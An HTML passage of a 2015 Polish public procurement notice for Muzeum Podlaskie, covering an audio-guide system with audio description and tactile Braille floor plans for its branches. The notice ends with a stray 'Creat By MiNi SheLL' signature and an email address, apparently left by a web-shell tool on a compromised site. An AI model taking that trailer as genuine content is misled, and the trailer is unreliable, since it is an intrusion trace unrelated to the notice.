<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa systemu audioprzewodników wraz z jego wdrożeniem do 3 oddziałów Muzeum Podlaskiego w Białymstoku oraz dostawa wraz z montażem obiektów tyflograficznych do 8 oddziałów Muzeum Podlaskiego w Białymstoku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa systemu audioprzewodników wraz z jego wdrożeniem do 3 oddziałów Muzeum Podlaskiego w Białymstoku, tj.:
1)	Muzeum Podlaskie - siedziba główna Ratusz, Rynek Kościuszki 10, Białystok
2)	Muzeum Rzeźby A. Karnego - ul. Świętojańska 17, Białystok
3)	Muzeum w Tykocinie - ul. Kozia 2, Tykocin

Zamówienie obejmuje:

1)	ZAKUP I DOSTAWĘ SPRZĘTU
L.p.	SPRZĘT	ilość
1.	Urządzenie odsłuchowe wraz z akumulatorem	60 szt.
2.	Ładowarka do 10 urządzeń odsłuchowych	6 szt.
3.	Słuchawki	60 szt.
4.	Słuchawki dla osób niewidomych	40 szt.
5.	Znaczniki radiowe obiektów (ukrywane w ekspozycji)	55 szt.
6.	Znacznik na podczerwień do wyzwalania nagrań poprzez skierowanie audioprzewodnika na nadajnik	62 szt.
7.	Programator USB do wgrywania kontentu i komunikacji z urządzeniami odsłuchowymi	1 szt.
8.	Oprogramowanie statystyczne	1 szt.
Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku Nr 8 do SIWZ.


2)	OPRACOWANIE I NAGRANIE ŚCIEŻEK DŹWIĘKOWYCH

L.p.	OPIS	ilość
RATUSZ - AUDIODESKRYPCJA	
1.Koncepcja i opracowanie scenariusza audiodeskrypcji dla osób niewidomych na podstawie wizyty i konsultacji z Zamawiającym (z uwzględnieniem opisów do ok. 15 obrazów),  120 min.	2 szt.
2.Nagranie lektorskie, nieograniczona licencja,  120 min.2 szt.
RATUSZ - AUDIOWYCIECZKA DLA DOROSŁYCH	
1.Koncepcja i opracowanie scenariusza do audiowycieczki dla dorosłych od 18 roku życia niewidomych na podstawie wizyty i konsultacji z Zamawiającym, język polski, 60 min.	1szt.
2.Nagranie Lektorskie, język polski, nieograniczona licencja, 60 min.	1 szt.
3.Efekty dźwiękowe ( sztuka+montaż)	30 szt.
RATUSZ - ŚCIEŻKA DLA DOROSŁYCH - JĘZ. ANG.	
1.Koncepcja i opracowanie scenariusza do audiowycieczki dla odbiorcy angielskojęzycznego z uwzględnieniem ich specyfiki (inna wiedza ogólna), język angielski, do 60 min.	1 szt.
2.Nagranie Lektorskie, język angielski akcent brytyjski BBC English, klasa A, do 60 min.	1 szt.
3. Efekty dźwiękowe (montaż)	30 szt.
MUZEUM W TYKOCINIE - AUDIODESKRYPCJA	
1.Koncepcja i opracowanie scenariusza audiodeskrypcji dla osób niewidomych na podstawie wizyty i konsultacji z Zamawiającym (w tym: synagoga wraz z babińcem) 120 min.	2 szt.
2.Nagranie lektorskie, nieograniczona licencja, do 120 min.	2 szt.
MUZEUM W TYKOCINIE - ŚCIEŻKA DLA DOROSŁYCH	
1.Koncepcja i opracowanie scenariusza do audiowycieczki dla dorosłych od 18 roku życia niewidomych na podstawie wizyty i konsultacji z Zamawiającym język polski, do 60 min.	1 szt.
2.Nagranie Lektorskie, język polski nieograniczona licencja, do 60 min.	1szt.
3.Efekty dźwiękowe (sztuka + montaż)	30 szt.
MUZEUM W TYKOCINIE - ŚCIEŻKA DLA DOROSŁYCH - JĘZ. ANG.	
1.Koncepcja i opracowanie scenariusza do audiowycieczki dla odbiorcy angielskojęzycznego z uwzględnieniem ich specyfiki (inna wiedza ogólna), język angielski, do 60 min.	1szt.
2.Nagranie Lektorskie, język angielski akcent brytyjski BBC English, klasa A, do 60 min.	1szt.
3.Efekty dźwiękowe (montaż)	30szt.
MUZEUM RZEŹBY ALFONSA KARNEGO - AUDIODESKRYPCJA	
1.Koncepcja i opracowanie scenariusza audiodeskrypcji dla osób niewidomych na podstawie wizyty i konsultacji z Zamawiającym (w tym: przejście przez całość ekspozycji, audiodeskrypcja do max. 15 eksponatów), do 180 min.	3szt.
2.Nagranie lektorskie, nieograniczona licencja, do 180 min.	3szt.
MUZEUM RZEŹBY ALFONSA KARNEGO - ŚCIEŻKA DLA DOROSŁYCH	
1.Koncepcja i opracowanie scenariusza do audiowycieczki dla dorosłych od 18 roku życia niewidomych na podstawie wizyty i konsultacji z Zamawiającym, język polski, do 60 min.	1 szt.
2.Nagranie Lektorskie, język polski nieograniczona licencja, do 60 min.	1szt.
3.Efekty dźwiękowe (sztuka + montaż)	30szt.

3)	Wykonawca zobowiązuje się do zainstalowania, uruchomienia, weryfikacji i adaptacji kontentu oraz do przeszkolenia obsługi z obsługi zakupionego sprzętu w w/w Oddziałach Zamawiającego
4)	W ramach realizacji przedmiotu zamówienia i wynagrodzenia wynikającego z umowy Wykonawca zobowiązany będzie, pod rygorem zapłaty kary umownej,  do dokonania poprawek po pierwszym półroczu działania ekspozycji, zmian w scenariuszu, nagraniach lektorskich, wgrania na urządzenia, język polski, do 45 min.
5)	Oferowany sprzęt ma być fabrycznie nowy, bez wad i umożliwiający działanie systemu, a Wykonawca udziela na dostarczony sprzęt min. 24 miesięcznej gwarancji na warunkach wynikających z umowy stanowiącej załącznik nr 7 do SIWZ.
6)	System audioprzewodników winien działać w sposób automatyczny w zależności od miejsca, w którym znajduje się zwiedzający
7)	Wykonawca zobowiązany jest przy podpisaniu protokołu, dostarczyć dokumentację w języku polskim, zawierającą instrukcję obsługi i konfiguracji audioprzewodników oraz dokument gwarancji na warunkach nie gorszych niż wynikające z umowy i SIWZ.
8)	Wykonawca zobowiązany jest podczas opracowywania scenariuszy audiowycieczek  do konsultacji z Zamawiającym na każdym etapie prac.
9)	Wykonawca zobowiązany jest do dostarczenia Zamawiającemu do korekty plików z materiałami dźwiękowymi przed ich instalacją w urządzeniach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.35.30.00-2, 32.34.24.10-9, 79.53.00.00-8, 32.23.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Gwarancja - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia jest opracowanie, wykonanie, dostawa i montaż tyflograficznych planów budynków Oddziałów Muzeum Podlaskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	PLANY TYFLOGRAFICZNE:

1)	Ratusz w Białymstoku, Rynek Kościuszki 10 Białystok,  tyflograficzny plan sal na stojaku do umieszczenia wewnątrz budynku, 
1 tyflografika: parter i podziemia, fot. 1 i 2.

2)	Muzeum Rzeźby Alfonsa Karnego, ul. Świętojańska 17 Białystok,  tyflograficzny plan sal na stojaku do umieszczenia wewnątrz budynku,
1 tyflografika: parter, fot 3. 

3)	Muzeum Historyczne w Białymstoku, ul. Warszawska 37 Białystok,  tyflograficzny plan sal na stojaku do umieszczenia wewnątrz budynku, 
1 tyflografika: parter, fot. 4; 
1 tyflografika: piętro, fot. 5.

4)	Białostockie Muzeum Wsi, ul. Nadawki 21 C Wasilków,  tyflograficzny plan sal na stojaku do umieszczenia na wolnym powietrzu, odporny na warunki atmosferyczne, 
1 tyflografika: plan skansenu, fot. 6.

5)	Muzeum Wnętrz Pałacowych w Choroszczy, ul. Pałacowa 2 Choroszcz,  tyflograficzny plan sal na stojaku do umieszczenia wewnątrz budynku, 
1 tyflografika: parter, fot. 7; 
1 tyflografika: piętro, fot. 8.

6)	Muzeum w Bielsku Podlaskim, ul. Mickiewicza 45 Bielsk Podlaski,  tyflograficzny plan sal na stojaku do umieszczenia wewnątrz budynku, 
1 tyflografika: parter, fot. 9; 
1 tyflografika: piętro, fot. 10.

7)	Muzeum w Tykocinie, ul. Kozia 2 Tykocin, tyflograficzny plan sal na stojaku do umieszczenia wewnątrz budynku, 
1 tyflografika: plan synagogi, fot. 11. 

8)	Muzeum Ikon w Supraślu, ul. Klasztorna 1 Supraśl,  tyflograficzny plan sal na stojaku do umieszczenia wewnątrz budynku, 
1 tyflografika: podziemia, fot. 12, strona 1, 
1 tyflografika: parter, fot. 12, strona 2,
1 tyflografika: piętro, fot. 12, strona 3.

2.	Plany tyflograficzne mają być wykonane wg następujących parametrów: 
- format dostosowany do rozmieszczenia i liczby sal w poszczególnych obiektach
- plansze z informacjami naniesionymi w formie druku wypukłego wykonane w technologii temoformowania próżniowego z tworzywa PET o grubości 0,35 mm, pełnokolorowy poddruk odporny na promieniowanie UV i nanoszony na spienione PCV 
- dołączenie zapasowej warstwy reliefowej do każdej tyflografiki
- umieszczone na stabilnym okrągłym stojaku, wykonane ze:
stali węglowej (tyflografiki dla wszystkich oddziałów Muzeum z wyjątkiem Białostockiego Muzeum Wsi)
stali nierdzewnej ( tyflografika Białostockiego Muzeum Wsi)
w wymiarach odpowiadających formatowi planu
- nazwa tytułowa planu oraz opisy pomieszczeń w formie prostych komunikatów (np. schody, winda, kasa) w języku polskim oraz w alfabecie Brajla. Tłumaczenie opisów pomieszczeń na język Brajla stanowi część zamówienia. 
- nachylenie planu pod kątem umożliwiającym swobodne użytkowanie przez zwiedzających 
- z możliwością podjechania wózkiem inwalidzkim
- wielkość liternictwa i znaków alfabetu Brajla muszą być dostosowane do możliwości percepcji odbiorców niewidomych
3.	Wykonawca zobowiązuje się do dostawy i montażu tyflograficznych planów do każdego z budynków Oddziałów Muzeum Podlaskiego. 
4.	Wykonawca udziela co najmniej 60 - miesięcznej gwarancji.
5.	Wykonawca zobowiązany jest podczas realizacji zamówienia do konsultacji z Zamawiającym na każdym etapie prac.
6.	Zamawiający zastrzega sobie prawo udzielenia zamówienia na zmniejszoną, niż wskazane w SIWZ,  ilości poszczególnych składników zamówienia lub nie udzielenia zamówienia na niektóre składniki zamówienia wskazane w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.11.43.00-5, 22.31.20.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Jakość - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com